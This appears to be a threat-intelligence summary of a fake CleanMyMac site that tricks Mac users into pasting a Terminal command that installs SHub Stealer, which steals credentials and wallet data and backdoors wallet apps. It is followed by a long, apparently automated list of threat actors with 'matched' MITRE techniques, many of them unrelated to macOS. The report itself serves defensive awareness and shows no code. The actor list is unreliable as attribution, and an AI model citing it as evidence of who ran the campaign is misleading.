Trusted Design

Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets

概要

A deceptive website impersonating CleanMyMac tricks users into installing SHub Stealer, a sophisticated macOS malware. The malware steals sensitive data, including passwords, browser data, cryptocurrency wallets, and Telegram sessions. It can also modify wallet apps to steal recovery phrases. The attack begins with users pasting a command into Terminal, which downloads and executes a malicious script. The malware performs extensive data collection from various browsers and wallet applications, and installs persistent backdoors in certain crypto wallet apps. SHub Stealer is part of a growing family of AppleScript-based macOS infostealers, demonstrating increasing sophistication in targeting Mac users.

Created: 2026-03-09

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

APT38

Score: 19.19
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1566.001 - Spearphishing Attachment
  • T1059.010 - AutoHotKey & AutoIT
  • T1009 - Binary Padding
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Moonstone Sleet

Score: 12.78
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

FIN8

Score: 6.96
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Ke3chang

Score: 19.21
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1027.008 - Stripped Payloads
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

FIN7

Score: 33.06
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1115 - Clipboard Data
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1009 - Binary Padding
  • T1011.001 - Exfiltration Over Bluetooth
  • T1218.012 - Verclsid
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

HAFNIUM

Score: 6.19
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1027.008 - Stripped Payloads
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Winter Vivern

Score: 15.43
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT19

Score: 10.89
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1553.004 - Install Root Certificate
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

FIN10

Score: 3.84
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
MITREへのリンク →

APT32

Score: 32.87
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1597.002 - Purchase Technical Data
  • T1546.013 - PowerShell Profile
  • T1566.002 - Spearphishing Link
  • T1115 - Clipboard Data
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
  • T1553.004 - Install Root Certificate
  • T1059.012 - Hypervisor CLI
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT39

Score: 22.75
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1597.002 - Purchase Technical Data
  • T1566.001 - Spearphishing Attachment
  • T1499.002 - Service Exhaustion Flood
  • T1059.010 - AutoHotKey & AutoIT
  • T1050 - New Service
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT37

Score: 7.66
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Lazarus Group

Score: 31.59
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1071.004 - DNS
  • T1606.002 - SAML Tokens
  • T1059.010 - AutoHotKey & AutoIT
  • T1070.008 - Clear Mailbox Data
  • T1050 - New Service
  • T1009 - Binary Padding
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Tropic Trooper

Score: 9.03
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1059.010 - AutoHotKey & AutoIT
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Threat Group-3390

Score: 17.04
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1115 - Clipboard Data
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Earth Lusca

Score: 20.64
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Magic Hound

Score: 23.35
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1566.002 - Spearphishing Link
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1683 - Generate Content
  • T1553.004 - Install Root Certificate
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

ZIRCONIUM

Score: 12.58
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1087.004 - Cloud Account
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Chimera

Score: 23.05
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1003.007 - Proc Filesystem
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1542.004 - ROMMONkit
  • T1157 - Dylib Hijacking
  • T1574 - Hijack Execution Flow
  • T1132.002 - Non-Standard Encoding
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Patchwork

Score: 10.96
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1566.002 - Spearphishing Link
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Stealth Falcon

Score: 5.59
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1562.012 - Disable or Modify Linux Audit System
  • T1087.004 - Cloud Account
MITREへのリンク →

Volt Typhoon

Score: 23.28
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1567 - Exfiltration Over Web Service
  • T1070.008 - Clear Mailbox Data
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

LuminousMoth

Score: 18.57
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1606.002 - SAML Tokens
  • T1115 - Clipboard Data
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1584.005 - Botnet
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Aquatic Panda

Score: 12.72
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Gamaredon Group

Score: 33.68
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1552.005 - Cloud Instance Metadata API
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1061 - Graphical User Interface
  • T1542.004 - ROMMONkit
  • T1059.013 - Container CLI/API
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

GALLIUM

Score: 11.93
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Wizard Spider

Score: 21.55
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1038 - DLL Search Order Hijacking
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link
MITREへのリンク →

APT41

Score: 30.10
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1499.001 - OS Exhaustion Flood
  • T1584.008 - Network Devices
  • T1071.004 - DNS
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1564.003 - Hidden Window
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

OilRig

Score: 32.86
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1552.005 - Cloud Instance Metadata API
  • T1606.002 - SAML Tokens
  • T1566.001 - Spearphishing Attachment
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1592.002 - Software
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

HEXANE

Score: 14.69
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1499.003 - Application Exhaustion Flood
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Windshift

Score: 6.30
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

MuddyWater

Score: 24.15
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1518.002 - Backup Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Dragonfly

Score: 18.30
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1584.008 - Network Devices
  • T1566.002 - Spearphishing Link
  • T1115 - Clipboard Data
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Medusa Group

Score: 19.30
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1009 - Binary Padding
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link
MITREへのリンク →

Sandworm Team

Score: 30.58
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link
MITREへのリンク →

Storm-1811

Score: 9.29
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Sidewinder

Score: 10.61
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1546.013 - PowerShell Profile
  • T1566.002 - Spearphishing Link
  • T1218.012 - Verclsid
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT3

Score: 13.55
Matched TTPs:
  • T1557 - Adversary-in-the-Middle
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1553.004 - Install Root Certificate
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Ember Bear

Score: 19.31
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1584.008 - Network Devices
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1656 - Impersonation
  • T1668 - Exclusive Control
MITREへのリンク →

Poseidon Group

Score: 5.12
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1003.007 - Proc Filesystem
MITREへのリンク →

Mustang Panda

Score: 20.09
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1218.012 - Verclsid
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Tonto Team

Score: 4.86
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Suckfly

Score: 4.02
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1157 - Dylib Hijacking
MITREへのリンク →

BlackByte

Score: 24.20
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1009 - Binary Padding
  • T1134.001 - Token Impersonation/Theft
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link
MITREへのリンク →

APT28

Score: 34.04
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1499.001 - OS Exhaustion Flood
  • T1071.004 - DNS
  • T1552.005 - Cloud Instance Metadata API
  • T1566.002 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1542.004 - ROMMONkit
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1553.004 - Install Root Certificate
  • T1059.012 - Hypervisor CLI
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Sowbug

Score: 5.63
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1542.004 - ROMMONkit
MITREへのリンク →

Storm-0501

Score: 21.46
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1027 - Obfuscated Files or Information
  • T1027.014 - Polymorphic Code
  • T1204.001 - Malicious Link
MITREへのリンク →

Axiom

Score: 18.94
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1499.003 - Application Exhaustion Flood
  • T1177 - LSASS Driver
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1160 - Launch Daemon
MITREへのリンク →

Leviathan

Score: 25.43
Matched TTPs:
  • T1597.002 - Purchase Technical Data
  • T1059.010 - AutoHotKey & AutoIT
  • T1050 - New Service
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1157 - Dylib Hijacking
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Contagious Interview

Score: 36.27
Matched TTPs:
  • T1044 - File System Permissions Weakness
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1552.003 - Shell History
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1690 - Prevent Command History Logging
  • T1656 - Impersonation
  • T1059.006 - Python
  • T1221 - Template Injection
MITREへのリンク →

Winnti Group

Score: 4.06
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Rocke

Score: 16.83
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1036.009 - Break Process Trees
  • T1059.010 - AutoHotKey & AutoIT
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1059.013 - Container CLI/API
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

TeamTNT

Score: 26.12
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1036.009 - Break Process Trees
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1142 - Keychain
  • T1597 - Search Closed Sources
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

UNC3886

Score: 23.28
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1009 - Binary Padding
  • T1585.002 - Email Accounts
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
MITREへのリンク →

Turla

Score: 23.05
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1552.005 - Cloud Instance Metadata API
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Saint Bear

Score: 7.24
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1091 - Replication Through Removable Media
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
MITREへのリンク →

FIN6

Score: 11.94
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1505 - Server Software Component
MITREへのリンク →

Silence

Score: 5.02
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

LazyScripter

Score: 11.71
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

TA505

Score: 15.79
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Cobalt Group

Score: 11.97
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1518.002 - Backup Software Discovery
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Higaisa

Score: 13.94
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1569.003 - Systemctl
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1553.004 - Install Root Certificate
MITREへのリンク →

Kimsuky

Score: 49.66
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.012 - Verclsid
  • T1552.003 - Shell History
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1027.014 - Polymorphic Code
  • T1690 - Prevent Command History Logging
  • T1553.004 - Install Root Certificate
  • T1656 - Impersonation
  • T1132.002 - Non-Standard Encoding
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Indrik Spider

Score: 12.93
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Molerats

Score: 6.37
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1059.010 - AutoHotKey & AutoIT
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Leafminer

Score: 11.18
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1562.012 - Disable or Modify Linux Audit System
  • T1101 - Security Support Provider
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Star Blizzard

Score: 8.68
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
MITREへのリンク →

Daggerfly

Score: 5.13
Matched TTPs:
  • T1584.008 - Network Devices
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT29

Score: 22.32
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1177 - LSASS Driver
  • T1218.012 - Verclsid
  • T1218.005 - Mshta
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

FIN13

Score: 24.01
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1552.003 - Shell History
  • T1134.001 - Token Impersonation/Theft
  • T1199 - Trusted Relationship
  • T1668 - Exclusive Control
  • T1547.013 - XDG Autostart Entries
  • T1686.001 - Cloud Firewall
MITREへのリンク →

Agrius

Score: 10.12
Matched TTPs:
  • T1584.008 - Network Devices
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
MITREへのリンク →

APT5

Score: 6.44
Matched TTPs:
  • T1584.008 - Network Devices
  • T1027.008 - Stripped Payloads
MITREへのリンク →

menuPass

Score: 12.43
Matched TTPs:
  • T1584.008 - Network Devices
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1542.004 - ROMMONkit
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Sea Turtle

Score: 11.23
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
MITREへのリンク →

Salt Typhoon

Score: 9.82
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1608.002 - Upload Tool
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
MITREへのリンク →

Play

Score: 13.60
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1552.003 - Shell History
  • T1142 - Keychain
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Aoqin Dragon

Score: 6.62
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
MITREへのリンク →

RedCurl

Score: 11.32
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1562.012 - Disable or Modify Linux Audit System
  • T1574.010 - Services File Permissions Weakness
  • T1542.004 - ROMMONkit
MITREへのリンク →

Moses Staff

Score: 6.06
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Scattered Spider

Score: 48.64
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1566.002 - Spearphishing Link
  • T1583.001 - Domains
  • T1019 - System Firmware
  • T1136.002 - Domain Account
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1619 - Cloud Storage Object Discovery
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1564.003 - Hidden Window
  • T1027.002 - Software Packing
  • T1547.013 - XDG Autostart Entries
  • T1204.001 - Malicious Link
MITREへのリンク →

Silent Librarian

Score: 8.58
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
MITREへのリンク →

CURIUM

Score: 12.85
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1115 - Clipboard Data
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Transparent Tribe

Score: 6.29
Matched TTPs:
  • T1115 - Clipboard Data
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Mustard Tempest

Score: 7.55
Matched TTPs:
  • T1115 - Clipboard Data
  • T1091 - Replication Through Removable Media
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

BRONZE BUTLER

Score: 15.99
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1542.004 - ROMMONkit
  • T1218.010 - Regsvr32
